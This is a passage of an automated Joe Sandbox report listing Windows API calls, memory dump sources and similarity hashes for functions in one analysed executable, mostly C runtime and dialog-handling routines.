                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID: x`$
                          • API String ID: 3160817290-4233981836
                          • Opcode ID: 271b208a4e84df8a6fc5d1a71b0ecabc00e03fac7d2ebcfe7205cd964bd24976
                          • Instruction ID: 53cd126b3fb57a64ea63fe05d5afefe670b801f2585969a10d3ed5df5b28e6b7
                          • Opcode Fuzzy Hash: 271b208a4e84df8a6fc5d1a71b0ecabc00e03fac7d2ebcfe7205cd964bd24976
                          • Instruction Fuzzy Hash: 02F02835134631B6C61277F87C4EB1B26399BC2722B210119F919925A2EF67C83A8861
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 0021D2FB
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0021D303
                          • _ValidateLocalCookies.LIBCMT ref: 0021D391
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0021D3BC
                          • _ValidateLocalCookies.LIBCMT ref: 0021D411
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 3d2d7d4edbc49f644a49789f2bc10b0d13bc6de2b16bb743b9aa0bfd75d8e1f9
                          • Instruction ID: e8a35c53dac2f2f2a8a4ff509c815e37537ddc1f3f895224e878875474b0faf2
                          • Opcode Fuzzy Hash: 3d2d7d4edbc49f644a49789f2bc10b0d13bc6de2b16bb743b9aa0bfd75d8e1f9
                          • Instruction Fuzzy Hash: 11D17C36A24257CBDB208E6CD8803F9B7D2DFB2324F5C427AED545B281D7329DE69640
                          APIs
                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00229AA2,00000000,00000000,00000000,00000000,00000000,0021FD33), ref: 0022936F
                          • __fassign.LIBCMT ref: 002293EA
                          • __fassign.LIBCMT ref: 00229405
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0022942B
                          • WriteFile.KERNEL32(?,00000000,00000000,00229AA2,00000000,?,?,?,?,?,?,?,?,?,00229AA2,00000000), ref: 0022944A
                          • WriteFile.KERNEL32(?,00000000,00000001,00229AA2,00000000,?,?,?,?,?,?,?,?,?,00229AA2,00000000), ref: 00229483
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 51d274b67a1b22c0e3754ac7b9165930582c5b0525f2a5bb3779d018cccd8203
                          • Instruction ID: 7917c6207b8e46b90eb0df8473a6d1433417657c78c8ed53de95b3f5abc1f078
                          • Opcode Fuzzy Hash: 51d274b67a1b22c0e3754ac7b9165930582c5b0525f2a5bb3779d018cccd8203
                          • Instruction Fuzzy Hash: 3151A171A10219AFDB10DFA8E885BEEBBF8EF09300F14415AE959E7291D7709991CB60
                          APIs
                            • Part of subcall function 0022613A: _free.LIBCMT ref: 00226163
                          • _free.LIBCMT ref: 002261C4
                            • Part of subcall function 00223185: RtlFreeHeap.NTDLL(00000000,00000000,?,00226168,?,00000000,?,00000000,?,0022618F,?,00000007,?,?,002265D1,?), ref: 0022319B
                            • Part of subcall function 00223185: GetLastError.KERNEL32(?,?,00226168,?,00000000,?,00000000,?,0022618F,?,00000007,?,?,002265D1,?,?), ref: 002231AD
                          • _free.LIBCMT ref: 002261CF
                          • _free.LIBCMT ref: 002261DA
                          • _free.LIBCMT ref: 0022622E
                          • _free.LIBCMT ref: 00226239
                          • _free.LIBCMT ref: 00226244
                          • _free.LIBCMT ref: 0022624F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 5d448493cb97f6898b05d0044a6cbd6ef4af6b7ca5eaa52c1646b37e4230bf75
                          • Instruction ID: 3a8ab9f3d0d912d8565f71542f78bc9b83d2bce91ccd7b51e80240c9d99bc134
                          • Opcode Fuzzy Hash: 5d448493cb97f6898b05d0044a6cbd6ef4af6b7ca5eaa52c1646b37e4230bf75
                          • Instruction Fuzzy Hash: D8117273550724B6D920F7F0DC0BFCB779DAF40708F444818B69E6A193D628B5344E50
                          APIs
                          • GetLastError.KERNEL32(?,?,?,00220A4C,0022494F,?,00222F08,00000001,00000364,?,0022080C,00244590,00000010), ref: 00222F63
                          • _free.LIBCMT ref: 00222F98
                          • _free.LIBCMT ref: 00222FBF
                          • SetLastError.KERNEL32(00000000), ref: 00222FCC
                          • SetLastError.KERNEL32(00000000), ref: 00222FD5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID: x`$
                          • API String ID: 3170660625-4233981836
                          • Opcode ID: b11c028cbf8fa2e6daf0938e98ee0d01092d4e51cf305113573ed9817a499a85
                          • Instruction ID: 1cb60f97403cf143cfae6717615aa6c86b8a903c417afc2a27db79bfad04875b
                          • Opcode Fuzzy Hash: b11c028cbf8fa2e6daf0938e98ee0d01092d4e51cf305113573ed9817a499a85
                          • Instruction Fuzzy Hash: 7B017D36138631B7C6067BF4BD8DE1B213DDBC23713210119F81992591EF768C394530
                          APIs
                          • _free.LIBCMT ref: 002222E6
                            • Part of subcall function 00223185: RtlFreeHeap.NTDLL(00000000,00000000,?,00226168,?,00000000,?,00000000,?,0022618F,?,00000007,?,?,002265D1,?), ref: 0022319B
                            • Part of subcall function 00223185: GetLastError.KERNEL32(?,?,00226168,?,00000000,?,00000000,?,0022618F,?,00000007,?,?,002265D1,?,?), ref: 002231AD
                          • _free.LIBCMT ref: 002222F8
                          • _free.LIBCMT ref: 0022230B
                          • _free.LIBCMT ref: 0022231C
                          • _free.LIBCMT ref: 0022232D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID: d$
                          • API String ID: 776569668-3651395310
                          • Opcode ID: bb5661b21fe0391414ac799dd3617e82467df1565dc0ddc37ecfa5032ba0e145
                          • Instruction ID: 2c523bb772238277bf450fbd616be64685b02b664a402bb0c7d1e5ec1e16fa79
                          • Opcode Fuzzy Hash: bb5661b21fe0391414ac799dd3617e82467df1565dc0ddc37ecfa5032ba0e145
                          • Instruction Fuzzy Hash: 1AF03A79820231BBDF12EF98FC4D4463B65E707724391430AF81852274CB390AB2DF96
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002200A7,002200A7,?,?,?,00224CDC,00000001,00000001,D0E85006), ref: 00224AE5
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00224CDC,00000001,00000001,D0E85006,?,?,?), ref: 00224B6B
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,D0E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00224C65
                          • __freea.LIBCMT ref: 00224C72
                            • Part of subcall function 002231BF: RtlAllocateHeap.NTDLL(00000000,?,?,?,0021B1C1,?,?,001E1D09,00000018,1FE05385,?,0022E43A,000000FF), ref: 002231F1
                          • __freea.LIBCMT ref: 00224C7B
                          • __freea.LIBCMT ref: 00224CA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: b98f36bc68fabec2df150e79cf6dba5870da408e778b35a8603e25ca9eea44aa
                          • Instruction ID: 16eeffb74dde10f17e33336ba7e5e0ebd4cd3cbc2a928ddba36e9acb9292fc01
                          • Opcode Fuzzy Hash: b98f36bc68fabec2df150e79cf6dba5870da408e778b35a8603e25ca9eea44aa
                          • Instruction Fuzzy Hash: 3F51F472621227BFDB25AFA8EC41EFF77A9EB40750F15462AFC04D6150DB74DC608AA0
                          APIs
                          • GetDlgItem.USER32(?,00000400), ref: 001E507B
                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001E5087
                          • GetDlgItem.USER32(?,00000C35), ref: 001E5097
                          • SendMessageW.USER32(00000000,000000CC,?,00000000), ref: 001E50B1
                          • SetFocus.USER32(00000000), ref: 001E50B8
                          • EndDialog.USER32(?,?), ref: 001E50D1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ItemMessageSend$DialogFocus
                          • String ID:
                          • API String ID: 2037629393-0
                          • Opcode ID: 644eaa039518053c8bc78608027af194785f64f281cbd776b375a9ff93b2f4ed
                          • Instruction ID: f37c49b81ecbae5a5817c07676206af88b6af86835de40efc4583e7ef74b92c9
                          • Opcode Fuzzy Hash: 644eaa039518053c8bc78608027af194785f64f281cbd776b375a9ff93b2f4ed
                          • Instruction Fuzzy Hash: 3C11C432600A50ABDB205F69DC8DF7E7BA9EB49714F124160F906DF1A0D7B1DC40D7A0
                          APIs
                          • GetLastError.KERNEL32(?,?,0021D96A,0021CF89), ref: 0021D981
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0021D98F
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0021D9A8
                          • SetLastError.KERNEL32(00000000,?,0021D96A,0021CF89), ref: 0021D9FA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 88b69acffe05ccbd854992c24445349bb20d5433ab5f3cc7212317c7886ed017
                          • Instruction ID: ca57576bae6df42171ac05d88c98eefab32fe1077b2207cbb83848f4b6a6eeed
                          • Opcode Fuzzy Hash: 88b69acffe05ccbd854992c24445349bb20d5433ab5f3cc7212317c7886ed017
                          • Instruction Fuzzy Hash: FB01287713E712AE9B341AB47CCDE9A2AE4FB73B757200329F811501E1EF510CE09550
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002217E9,00000003,?,00221789,00000003,002445D0,0000000C,002218E0,00000003,00000002), ref: 00221858
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0022186B
                          • FreeLibrary.KERNEL32(00000000,?,?,?,002217E9,00000003,?,00221789,00000003,002445D0,0000000C,002218E0,00000003,00000002,00000000), ref: 0022188E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: a0e3d24a6ec773ea87ae88163e33c6d940ca390ab13b7ef961dc9ff50d25dab5
                          • Instruction ID: a2ed62739561b1e1ae66aea85c93d08e11f6dcd83bb76340295a22d00a76b561
                          • Opcode Fuzzy Hash: a0e3d24a6ec773ea87ae88163e33c6d940ca390ab13b7ef961dc9ff50d25dab5
                          • Instruction Fuzzy Hash: 96F04F71A21219BBDB159FA0EC5DBEEBFB8EB05711F4041A4F809A2150DB319960CAA1
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,1FE05385,?,00000208,00000000), ref: 001F1F48
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000208,00000000), ref: 001F1F73
                          • _wcslen.LIBCMT ref: 001F1FB9
                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000001,?,?,00000208,00000000), ref: 001F218D
                          • _wcslen.LIBCMT ref: 001F21B2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Module$FileName_wcslen$Handle
                          • String ID:
                          • API String ID: 1548812663-0
                          • Opcode ID: 102dace1492edde1cb4a6c109970e0e157e9e8ce5906dd481aac8264ed33f2b4
                          • Instruction ID: b7168b4703ec00462dc2ab07bd73996af10eed23c9507095f3759c7f85820ca2
                          • Opcode Fuzzy Hash: 102dace1492edde1cb4a6c109970e0e157e9e8ce5906dd481aac8264ed33f2b4
                          • Instruction Fuzzy Hash: 4AC1F6B19002189BDB24DF24DC887BE77F5FF49314F2106A9E51AD7291EB349A84CF51
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 1037ca5de5e45ef7ca3cfc378bdbb0fd8c6734ecc5388f3a0cc63b4724ef794c
                          • Instruction ID: ee90af5b1038b6fc465981de58592c12833ee4bd3db7ed1aef0dcf57cc38c4a6
                          • Opcode Fuzzy Hash: 1037ca5de5e45ef7ca3cfc378bdbb0fd8c6734ecc5388f3a0cc63b4724ef794c
                          • Instruction Fuzzy Hash: 5B41F336A10220FBCB20DFB8D881A5DB3B6EF99310B154169E505EB241DB32AE25CB80
                          APIs
                          • GetDlgItem.USER32(?,000003EB), ref: 001EA39A
                          • SetWindowTextW.USER32(00000000,002397B8), ref: 001EA3B2
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001EA46D
                          • TranslateMessage.USER32(?), ref: 001EA47B
                          • DispatchMessageW.USER32(?), ref: 001EA485
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Message$DispatchItemTextTranslateWindow
                          • String ID:
                          • API String ID: 2081180312-0
                          • Opcode ID: 5da29113d38646127a6ed0d9abb891cfaf616f6ad3ffb1faa74ef730d1e8d976
                          • Instruction ID: a6179b12c6094b689e1c517aae5a87e2b26a6abfc70eae3f717515f64e2d9edd
                          • Opcode Fuzzy Hash: 5da29113d38646127a6ed0d9abb891cfaf616f6ad3ffb1faa74ef730d1e8d976
                          • Instruction Fuzzy Hash: 6E31F870700A4AABCB09EB75D89DAEEFBA9FF59300F040119F51993191DF70A919CBA1
                          APIs
                          • EnterCriticalSection.KERNEL32(?,1FE05385), ref: 001F5D91
                          • LeaveCriticalSection.KERNEL32(?,1FE05385), ref: 001F5DB6
                          • WaitForSingleObject.KERNEL32(?,00002710,1FE05385), ref: 001F5DCE
                          • EnterCriticalSection.KERNEL32(00000000), ref: 001F5DFE
                          • LeaveCriticalSection.KERNEL32(00000000), ref: 001F5E25
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave$ObjectSingleWait
                          • String ID:
                          • API String ID: 1755037574-0
                          • Opcode ID: 0159bb81c086ae30180d8ecdca476fc1eb463926c94ee56c301a07e026de52f3
                          • Instruction ID: 23d1f6be09632041d29241bf08b721c4ca058e52651bfdb84308cd6786042495
                          • Opcode Fuzzy Hash: 0159bb81c086ae30180d8ecdca476fc1eb463926c94ee56c301a07e026de52f3
                          • Instruction Fuzzy Hash: BA316F71A02A199BDB20CF94D988B7EFBB5FF04B10F144619EE55AB391D7349E00CBA0
                          APIs
                            • Part of subcall function 001E5472: GetSystemMetrics.USER32(00000000), ref: 001E548F
                            • Part of subcall function 001E5472: GetSystemMetrics.USER32(00000001), ref: 001E5495
                            • Part of subcall function 001E5472: GetWindowRect.USER32(?,?), ref: 001E54A1
                            • Part of subcall function 001E5472: SetWindowPos.USER32(?,000000FE,?,?,00000001,?,?,?,?,?,?,?,001E4F63,00000001), ref: 001E54E8
                          • GetDlgItem.USER32(?,00000C42), ref: 001E4F6B
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 001E4F9B
                            • Part of subcall function 001E1FBC: _wcslen.LIBCMT ref: 001E1FD5
                          • SetWindowTextW.USER32(00000000,?), ref: 001E4FEA
                          • GetDlgItem.USER32(?,00000C35), ref: 001E500A
                          • SendMessageW.USER32(00000000,000000D2,00000000,00000000), ref: 001E501A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
